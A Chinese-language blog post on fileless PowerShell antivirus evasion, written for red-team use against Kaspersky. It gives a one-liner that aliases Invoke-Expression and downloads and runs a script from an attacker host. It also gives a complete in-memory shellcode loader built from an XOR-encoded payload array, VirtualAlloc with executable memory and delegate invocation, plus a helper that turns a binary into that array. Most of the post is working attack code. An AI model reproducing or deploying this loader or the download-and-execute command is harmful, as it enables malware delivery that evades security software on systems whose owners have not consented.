Powershell免殺(無文件落地免殺)
VSole2022-01-27 07:21:36
無文件落地
顧名思義,無需將惡意文件傳到目標服務器/機器上,直接利用powershell的特性加載到內存執行。為了在紅隊行動中更隱蔽的實施攻擊以及橫向移動,同時還可以解決目標不出網只能通過dns上線時的棘手問題,利用powershell可以避免一行行echo。
通過兩種方式進行無文件落地的免殺,一種是出網的情況,另一種為不出網情況。
聲明: 文章內容僅供網絡安全愛好者學習使用,請勿用文章中提到的技術或工具做違法的事情,否則后果自負。
目標出網
利用downloadstring遠程讀取powershell文件并iex執行
- iex => Invoke-expression 將字符串當作powershell代碼執行
- Set-Alias 給powershell函數以及變量賦予別稱
出網的思路是,通過downloadstring下載上篇文章中的remoteshell.ps1文件并執行,但是需要繞過卡巴斯基對downloadstring操作的攔截。方法有很多種,我通過以下方式繞過:
# command
powershell set-alias -name kaspersky -value Invoke-Expression;kaspersky(New-Object Net.WebClient).DownloadString('http://attacker.ip/payload.ps1')
同樣的不僅命令需要繞過殺軟攔截,遠程待讀取的文件也需要過靜態查殺(修改一下特征就好了)。
目標不出網
經過測試判斷出了卡巴斯基的攔截特征,因此直接將字節數組寫死在命令中及可繞過,具體過程不分析了,看代碼吧。
powershell $string={Set-StrictMode -Version 2;function func_get_proc_address {Param ($var_module, $var_procedure);$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() ^| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods');$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'));return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))};function func_get_delegate_type {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,[Parameter(Position = 1)] [Type] $var_return_type = [Void]);$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]);$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed');$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed');return $var_type_builder.CreateType()};If ([IntPtr]::size -eq 8) {[Byte[]]$var_code = 230,82,153,254,234,242,210,26,26,26,91,75,91,74,72,75,76,82,43,200,127,82,145,72,122,82,145,72,2,82,145,72,58,82,145,104,74,82,21,173,80,80,87,43,211,82,43,218,182,38,123,102,24,54,58,91,219,211,23,91,27,219,248,247,72,91,75,82,145,72,58,145,88,38,82,27,202,124,155,98,2,17,24,111,104,145,154,146,26,26,26,82,159,218,110,125,82,27,202,74,145,82,2,94,145,90,58,83,27,202,249,76,82,229,211,91,145,46,146,82,27,204,87,43,211,82,43,218,182,91,219,211,23,91,27,219,34,250,111,235,86,25,86,62,18,95,35,203,111,194,66,94,145,90,62,83,27,202,124,91,145,22,82,94,145,90,6,83,27,202,91,145,30,146,82,27,202,91,66,91,66,68,67,64,91,66,91,67,91,64,82,153,246,58,91,72,229,250,66,91,67,64,82,145,8,243,85,229,229,229,71,112,26,83,164,109,115,116,115,116,127,110,26,91,76,83,147,252,86,147,235,91,160,86,109,60,29,229,207,82,43,211,82,43,200,87,43,218,87,43,211,91,74,91,74,91,160,32,76,99,189,229,207,241,105,64,82,147,219,91,162,21,61,26,26,87,43,211,91,75,91,75,112,25,91,75,91,160,77,147,133,220,229,207,241,67,65,82,147,219,82,43,200,83,147,194,87,43,211,72,114,26,24,90,158,72,72,91,160,241,79,52,33,229,207,82,147,220,82,153,217,74,112,16,69,82,147,235,82,147,192,83,221,218,229,229,229,229,87,43,211,72,72,91,160,55,28,2,97,229,207,159,218,21,159,135,27,26,26,82,229,213,21,158,150,27,26,26,241,201,243,254,27,26,26,242,184,229,229,229,53,47,77,98,67,26,218,42,11,236,149,201,251,204,220,64,129,163,25,180,84,43,66,101,79,111,242,85,216,18,90,199,48,212,5,88,53,247,178,185,227,158,220,215,153,62,176,117,55,14,251,20,228,201,120,104,7,232,65,30,45,98,54,249,9,121,198,53,189,153,110,202,220,254,251,82,19,125,46,26,79,105,127,104,55,91,125,127,116,110,32,58,87,117,96,115,118,118,123,53,47,52,42,58,50,121,117,119,106,123,110,115,120,118,127,33,58,87,73,83,95,58,35,52,42,33,58,77,115,116,126,117,109,105,58,84,78,58,44,52,42,33,58,78,104,115,126,127,116,110,53,47,52,42,51,23,16,26,41,167,140,23,122,110,225,235,126,193,86,236,74,58,43,108,214,247,158,133,246,52,202,48,251,53,214,156,196,185,191,22,148,155,185,114,202,123,188,143,155,70,17,95,32,118,240,201,135,186,168,203,211,168,41,69,74,25,168,42,215,44,90,124,209,175,24,221,195,250,174,192,127,197,110,70,7,135,214,191,63,3,232,186,97,196,22,195,92,130,21,158,254,7,91,210,67,95,221,177,210,209,192,186,70,44,138,175,245,127,176,78,190,184,136,92,82,205,108,115,184,254,34,33,192,72,168,178,31,213,211,209,89,162,197,155,29,242,139,154,160,15,11,184,160,178,33,103,137,155,90,88,125,54,225,217,12,2,81,219,130,45,27,231,147,200,252,43,196,20,238,149,101,102,211,107,74,11,226,38,0,240,150,54,15,151,134,178,96,242,144,215,60,20,173,135,45,37,155,85,96,67,99,18,129,223,164,55,75,1,140,139,88,103,253,42,127,245,208,251,109,226,124,27,222,26,91,164,234,175,184,76,229,207,82,43,211,160,26,26,90,26,91,162,26,10,26,26,91,163,90,26,26,26,91,160,66,190,73,255,229,207,82,137,73,73,82,147,253,82,147,235,82,147,192,91,162,26,58,26,26,83,147,227,91,160,8,140,147,248,229,207,82,153,222,58,159,218,110,172,124,145,29,82,27,217,159,218,111,205,66,66,66,82,31,26,26,26,26,74,217,242,133,231,229,229,43,35,40,52,43,44,34,52,43,47,41,52,43,43,42,26,26,26,26,18;for ($x = 0; $x -lt $var_code.Count; $x++) {$var_code[$x] = $var_code[$x] -bxor 26;};$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])));$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40);[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length);$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])));$var_runme.Invoke([IntPtr]::Zero)}}.ToString();iex $string
利用下面的代碼從bin文件中讀取字節數組,并替換文中的字節數組即可。
# readbytes.ps1
[Byte[]]$bytes = [System.IO.File]::ReadAllBytes($args[0])
$s = ""
for ($x = 0; $x -lt $bytes.Count; $x++) {
$s += $bytes[$x]
$s += ","
}
$s
要注意的是去掉最后一個逗號”,“。
結束語
利用powershell無文件落地上線的方式還有很多,就不全都舉例了,僅記錄一些思路。由于我覺得卡巴斯基更嚴格一些,且工作中經常遇到,所以全文都是以卡巴斯基為例,但是不出意外的話過國內的應該沒問題。總結下來也沒什么過于亮眼之處,后面會寫一個自動化的工具,暫時不貼出來了,等完善了再說。對這幾天學習的一個總結,并分享一些思路,隨著接下來的學習更加深入,再分享一些更深層次的技術筆記吧。
另外,如果文中出現了哪些技術性的問題,請一定聯系我修改,我不想誤人子弟。
最后,聽說物理機上的360和虛擬機的不太一樣?
VSole
網絡安全專家